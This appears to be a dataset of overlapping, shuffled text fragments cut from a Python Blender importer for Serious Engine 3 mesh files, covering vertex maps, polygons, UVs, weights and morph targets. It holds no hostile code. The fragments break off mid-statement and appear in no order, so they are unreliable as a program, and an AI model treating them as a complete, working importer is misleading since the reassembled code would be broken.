"vertex maps block processed_maps = 0 num_of_texcoord_maps = 0 num_of_weight_maps = 0 num_of_morph_maps",
"= get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face in",
"elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1",
"get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces:",
"ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges =",
"obj.material_slots[-1].material = material for face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world = tranf_mat",
"= se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer,",
"Vector(vert_data) + Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if se3_weight_maps: vertex_groups = [] for se3_weight_map",
"j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0),",
"file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys =",
"get_bl_face(se3_layer, se3_vertex_indices): new_indices = [] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = [] for i",
"last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges def get_bl_fgons(vertices, ngon_face): fgon_faces = []",
"for idx, uv_data in enumerate(uvs_data): try: data = real_face[1][idx][real_index] except: data = (1,0)",
"= file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open",
"uv_loop = mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly =",
"which_edge == edge_rev: return False return True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1])",
"map block file_query.follows_block_end_decl() #close vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices",
"import (Matrix, Vector) import math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer",
"= vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers",
"while processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer",
"block processed_layers += 1 file_query.follows_block_end_decl() #close layers block return mesh def get_bl_face(se3_layer, se3_vertex_indices):",
"real_index = real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data): try: data = real_face[1][idx][real_index] except:",
"in range(num_of_indices): next_index = se3_vertex_indices[current_index + 1] if current_index != last_index else se3_vertex_indices[0]",
"se3_layer.surface_maps: materials = [] for se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add()",
"se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap in",
"se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close",
"#close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\")",
"se3_weight_maps = se3_layer.weight_maps if se3_weight_maps: vertex_groups = [] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name))",
"#close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys = 0",
"get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps",
"k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), (",
"block num_of_values = file_query.get_num_of_values() processed_values = 0 is_last_value = False last_value_idx = num_of_values",
"= obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys",
"obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices:",
"#open vertex maps block processed_maps = 0 num_of_texcoord_maps = 0 num_of_weight_maps = 0",
"maps block processed_maps = 0 num_of_texcoord_maps = 0 num_of_weight_maps = 0 num_of_morph_maps =",
"morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block",
"fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements edges = [] real_faces = [] se3_surface_map_indices",
"0 num_of_weight_maps = 0 num_of_morph_maps = 0 while processed_maps < num_of_maps: map_type =",
"= file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block",
"num_of_indices = len(se3_vertex_indices) last_index = num_of_indices - 1 for current_index in range(num_of_indices): next_index",
"edges): edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count += 1 else: ngon_face =",
"[real_face[0] for real_face in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for",
"[] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers",
"se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index",
"for face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world = tranf_mat bpy.ops.object.transform_apply(rotation=True) context.view_layer.update() return",
"num_of_processed_vertices < num_of_verts: vertex = se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers",
"enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0,",
"edges def get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face",
"block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems += 1 file_query.follows_block_end_decl() #close elements block",
"return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices = len(se3_vertex_indices) last_index =",
"other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data",
"enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if",
"block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl() #close vertex",
"= se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open",
"last_pointer_index = num_of_pointers - 1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers == last_pointer_index:",
"num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem",
"= file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs",
"fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges): for edge in edges: edge_rev =",
"import math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices",
"file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map",
"vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex)",
"0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element",
"= get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count +=",
"vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer =",
"file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys = 0 while processed_polys < num_of_polys: poly",
"return uvs_data def read_file(operator, context): from mathutils import (Matrix, Vector) import math filepath",
"#open layers block processed_layers = 0 while processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\")",
"return fgon_faces def edge_not_in(which_edge, edges): for edge in edges: edge_rev = (edge[0], edge[1])",
"se3_layer in se3_mesh.layers: fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements edges = [] real_faces",
"se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index",
"= file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem",
"= se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1])",
"#close vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices =",
"block processed_poly_maps = 0 while processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False) map_name =",
"range(num_of_indices): next_index = se3_vertex_indices[current_index + 1] if current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index],",
"= file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block processed_layers = 0 while processed_layers < num_of_layers:",
"se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type ==",
"se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers",
"fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges): for edge in edges: edge_rev = (edge[0],",
"block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer = False last_pointer_index = num_of_pointers",
"1.0, 0.0, 0.0), ( 0.0, 0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj)",
"#open vertices block num_of_processed_vertices = 0 while num_of_processed_vertices < num_of_verts: vertex = se3.Vertex()",
"se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex",
"uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for",
"= 0 while processed_maps < num_of_maps: map_type = file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl()",
"return edges def get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face) for",
"se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements",
"num_of_poly_maps: map_type = file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\")",
"layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block num_of_polys",
"polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block",
"se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0",
"real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv =",
"num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block processed_maps = 0 num_of_texcoord_maps =",
"se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts:",
"< num_of_values: if processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1",
"num_of_values - 1 while processed_values < num_of_values: if processed_values == last_value_idx: is_last_value =",
"poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx())",
"== se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type",
"block processed_elems += 1 file_query.follows_block_end_decl() #close elements block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl()",
"len(se3_vertex_indices) last_index = num_of_indices - 1 for current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index",
"in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1",
"if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count += 1 else:",
"= se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer",
"mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map",
"file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block num_of_polys =",
"= se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp) se3_weight_maps",
"= vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type ==",
"for index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers):",
"= file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems = 0 while processed_elems <",
"len(se3_layer.texcoord_maps) uvs_data = [] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for",
"1 file_query.follows_block_end_decl() #close layers block return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices = []",
"= 0 is_last_value = False last_value_idx = num_of_values - 1 while processed_values <",
"block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs < polygon_count:",
"type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif",
"+ 1] if current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges def",
"edge_rev: return False return True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data =",
"num_of_texcoord_maps = 0 num_of_weight_maps = 0 num_of_morph_maps = 0 while processed_maps < num_of_maps:",
"+= 1 file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close polygons",
"processed_layers += 1 file_query.follows_block_end_decl() #close layers block return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices",
"get_bl_edges(se3_vertex_indices): edges = [] num_of_indices = len(se3_vertex_indices) last_index = num_of_indices - 1 for",
"= bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices =",
"edges.append(face_edge) edge_index_count += 1 else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces",
"poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map)",
"== edge or which_edge == edge_rev: return False return True def get_bl_face_uv_data(real_face, bl_face):",
"file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer = False",
"for face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1 \"\"\"",
"context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map:",
"num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer = False last_pointer_index = num_of_pointers -",
"vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem",
"if processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl() #close",
"= se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = []",
"last_value_idx = num_of_values - 1 while processed_values < num_of_values: if processed_values == last_value_idx:",
"num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = [] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps =",
"data = (1,0) uv_data.append(data) return uvs_data def read_file(operator, context): from mathutils import (Matrix,",
"fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)]",
"= se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = [] for se3_surface_map in",
"uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return",
"vertex map block file_query.follows_block_end_decl() #close vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open",
"count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs <",
"bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world =",
"< num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index",
"file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices = 0 while num_of_processed_vertices < num_of_verts: vertex",
"1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer = True vertex_data_pointer",
"se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1",
"1 file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys",
"tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face = [] for tessed_index",
"in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for",
"0 while num_of_processed_vertices < num_of_verts: vertex = se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers =",
"current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index + 1] if current_index != last_index else",
"while processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\")",
"vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = [] for se3_surface_map",
"se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block processed_layers = 0 while processed_layers",
"layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open",
"get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces:",
"se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index",
"mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon =",
"uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index, tex_data",
"filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices = []",
"num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys = 0 while processed_polys <",
"= file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map = se3.PolygonMap(map_type,",
"for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges): for edge",
"file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems = 0 while processed_elems < num_of_map_elems:",
"1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl() #close vertex maps block num_of_verts",
"se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face",
"= se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data)",
"other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert",
"False last_pointer_index = num_of_pointers - 1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers ==",
"#open polygons block processed_polys = 0 while processed_polys < num_of_polys: poly = []",
"= 0 is_last_pointer = False last_pointer_index = num_of_pointers - 1 while num_of_processed_pointers <",
"except: data = (1,0) uv_data.append(data) return uvs_data def read_file(operator, context): from mathutils import",
"= se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open",
"for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count",
"= 0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close",
"tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0, 0.0), ( 0.0,",
"edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count += 1 else: ngon_face",
"file_query.follows_block_begin_decl() #open polygon maps block processed_poly_maps = 0 while processed_poly_maps < num_of_poly_maps: map_type",
"1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close layer block processed_layers",
"se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap in se3_non_basic_morph_map:",
"0.0, 0.0), ( 0.0, 0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active",
"= (edge[0], edge[1]) if which_edge == edge or which_edge == edge_rev: return False",
"processed_values < num_of_values: if processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values +=",
"layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close layer block processed_layers += 1",
"0.0), ( 0.0, 0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active =",
"= se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index =",
"se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) +",
"= 0 while num_of_processed_vertices < num_of_verts: vertex = se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers",
"num_of_morph_maps = 0 while processed_maps < num_of_maps: map_type = file_query.get_map_type() map_name = file_query.get_map_name()",
"== last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl() #close polygon block",
"se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp) se3_weight_maps =",
"enumerate(uvs_data): try: data = real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return uvs_data def",
"= 0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices",
